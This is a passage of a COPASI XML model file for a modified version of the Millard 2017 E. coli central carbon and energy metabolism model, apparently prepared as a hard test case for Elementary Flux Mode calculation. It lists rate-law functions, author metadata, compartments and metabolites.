<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Function_40">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2020-12-29T19:42:05Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
k*(AMP*ATP-ADP^2/Keq)
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_264" name="ADP" order="0" role="product"/>
<ParameterDescription key="FunctionParameter_263" name="AMP" order="1" role="substrate"/>
<ParameterDescription key="FunctionParameter_262" name="ATP" order="2" role="substrate"/>
<ParameterDescription key="FunctionParameter_261" name="Keq" order="3" role="constant"/>
<ParameterDescription key="FunctionParameter_250" name="k" order="4" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_41" name="Function for NDH2_1" type="UserDefined" reversible="true">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Function_41">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2020-12-29T19:42:05Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
Vmax*(NADH*Q-NAD*QH2/KeqNDH)
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_269" name="KeqNDH" order="0" role="constant"/>
<ParameterDescription key="FunctionParameter_268" name="NAD" order="1" role="product"/>
<ParameterDescription key="FunctionParameter_267" name="NADH" order="2" role="substrate"/>
<ParameterDescription key="FunctionParameter_266" name="Q" order="3" role="substrate"/>
<ParameterDescription key="FunctionParameter_265" name="QH2" order="4" role="product"/>
<ParameterDescription key="FunctionParameter_270" name="Vmax" order="5" role="constant"/>
</ListOfParameterDescriptions>
</Function>
</ListOfFunctions>
<Model key="Model_1" name="Millard2017 - E. coli central carbon and energy metabolism" simulationType="time" timeUnit="s" volumeUnit="l" areaUnit="m²" lengthUnit="m" quantityUnit="mmol" type="stochastic" avogadroConstant="6.0221408570000002e+23">
<MiriamAnnotation>
<rdf:RDF
xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#"
xmlns:dcterms="http://purl.org/dc/terms/"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:vCard="http://www.w3.org/2001/vcard-rdf/3.0#">
<rdf:Description rdf:about="#Model_1">
<dcterms:bibliographicCitation>
<rdf:Bag>
<rdf:li>
<rdf:Description>
<CopasiMT:isDescribedBy rdf:resource="http://identifiers.org/doi/10.1371/journal.pcbi.1005396"/>
</rdf:Description>
</rdf:li>
</rdf:Bag>
</dcterms:bibliographicCitation>
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2015-05-10T22:00:37Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
<dcterms:creator>
<rdf:Bag>
<rdf:li>
<rdf:Description>
<vCard:EMAIL>[email protected]</vCard:EMAIL>
<vCard:N>
<rdf:Description>
<vCard:Family>Millard</vCard:Family>
<vCard:Given>Pierre</vCard:Given>
</rdf:Description>
</vCard:N>
<vCard:ORG>
<rdf:Description>
<vCard:Orgname>INRA</vCard:Orgname>
</rdf:Description>
</vCard:ORG>
</rdf:Description>
</rdf:li>
<rdf:li>
<rdf:Description>
<vCard:EMAIL>[email protected]</vCard:EMAIL>
<vCard:N>
<rdf:Description>
<vCard:Family>Smallbone</vCard:Family>
<vCard:Given>Kieran</vCard:Given>
</rdf:Description>
</vCard:N>
<vCard:ORG>
<rdf:Description>
<vCard:Orgname>University of Manchester</vCard:Orgname>
</rdf:Description>
</vCard:ORG>
</rdf:Description>
</rdf:li>
<rdf:li>
<rdf:Description>
<vCard:EMAIL>[email protected]</vCard:EMAIL>
<vCard:N>
<rdf:Description>
<vCard:Family>Mendes</vCard:Family>
<vCard:Given>Pedro</vCard:Given>
</rdf:Description>
</vCard:N>
<vCard:ORG>
<rdf:Description>
<vCard:Orgname>University of Manchester</vCard:Orgname>
</rdf:Description>
</vCard:ORG>
</rdf:Description>
</rdf:li>
</rdf:Bag>
</dcterms:creator>
<dcterms:modified>
<rdf:Description>
<dcterms:W3CDTF>2015-05-10T22:00:37Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:modified>
<dcterms:modified>
<rdf:Description>
<dcterms:W3CDTF>2017-02-22T10:26:11Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:modified>
<dcterms:modified>
<rdf:Description>
<dcterms:W3CDTF>2020-12-29T16:14:53</dcterms:W3CDTF>
</rdf:Description>
</dcterms:modified>
<CopasiMT:is>
<rdf:Bag>
<rdf:li rdf:resource="http://identifiers.org/biomodels.db/MODEL1505110000"/>
</rdf:Bag>
</CopasiMT:is>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Comment>
<body xmlns="http://www.w3.org/1999/xhtml"><p>This model is based on the one described in this article:</p>
<p>Millard P, Smallbone K, Mendes P (2017) <a href="http://identifiers.org/doi/10.1371/journal.pcbi.1005396">Metabolic regulation is
sufficient for global and robust coordination of glucose
uptake, catabolism, energy production and growth in <i>Escherichia
coli</i>.</a> PLOS Computational Biology 13(2):e1005396</p>
<p>This is intended as a hard test for calculating Elementary Flux Modes. The Biomass reaction was removed from the original; some reactions were set to irreversible; all kinetics were changed to mass action.</p></body>
</Comment>
<ListOfCompartments>
<Compartment key="Compartment_0" name="cell_cytoplasm" simulationType="fixed" dimensionality="3" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Compartment_0">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-26T16:22:10Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Compartment>
<Compartment key="Compartment_1" name="extracellular" simulationType="fixed" dimensionality="3" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Compartment_1">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-26T16:22:10Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Compartment>
<Compartment key="Compartment_2" name="cell_periplasm" simulationType="fixed" dimensionality="3" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Compartment_2">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-16T10:08:42Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Compartment>
</ListOfCompartments>
<ListOfMetabolites>
<Metabolite key="Metabolite_0" name="ACCOA" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_0">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-17T08:09:06Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_1" name="ACO" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_1">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-14T12:22:27Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_2" name="ACP" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_2">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-14T12:22:29Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_3" name="AKG" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_3">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-17T08:08:54Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_4" name="BPG" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_4">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-01T14:57:13Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_5" name="CIT" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" />
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_6" name="DAP" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_6">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-15T10:03:10Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_7" name="E4P" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_7">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-16T11:41:38Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_8" name="F6P" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_8">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-26T16:25:24Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_9" name="FDP" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_9">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-30T23:49:14Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_10" name="FUM" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" />
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_11" name="G6P" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" />
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_12" name="GAP" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_12">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2015-01-03T00:12:37Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_13" name="GL6P" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_13">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-30T23:53:03Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_14" name="GLX" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_14">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-30T23:53:08Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_15" name="ICIT" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_15">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-15T14:59:12Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_16" name="KDPG" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_16">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-24T10:12:51Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_17" name="MAL" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" />
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_18" name="NAD" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_18">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-25T23:44:07Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_19" name="NADH" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_19">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-25T23:44:56Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_20" name="NADP" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_20">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-26T17:09:49Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_21" name="NADPH" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_21">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-01T13:58:22Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_22" name="OAA" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_22">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-25T19:45:19Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_23" name="PEP" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_23">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-24T16:37:45Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_24" name="PGA2" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" />
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_25" name="PGA3" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" />
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_26" name="PGN" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" />
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_27" name="PYR" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_27">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-31T12:41:19Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_28" name="Q" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_28">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-14T12:12:52Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_29" name="QH2" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_29">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-14T12:12:53Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_30" name="R5P" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" />
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_31" name="RU5P" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" />
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_32" name="S7P" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_32">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-24T10:25:24Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_33" name="SUC" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_33">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-25T19:46:56Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_34" name="SUCCOA" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_34">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-14T13:47:22Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_35" name="X5P" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_35">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2015-01-22T20:51:59Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_36" name="ei" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_36">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-15T14:56:48Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_37" name="eiP" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_37">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2020-12-29T19:42:05Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_38" name="eiia" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_38">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-16T09:44:24Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_39" name="eiiaP" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_39">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2020-12-29T19:42:05Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_40" name="eiicb" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_40">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2020-12-29T19:42:05Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_41" name="eiicbP" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_41">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-15T11:48:22Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_42" name="hpr" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_42">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-25T19:47:23Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_43" name="hprP" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_43">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-10T10:15:23Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_44" name="icd" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_44">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-25T19:53:36Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_45" name="icdP" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_45">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-25T19:53:40Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_46" name="tal" simulationType="reactions" compartment="Compartment_0" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_46">
<dcterms:created>
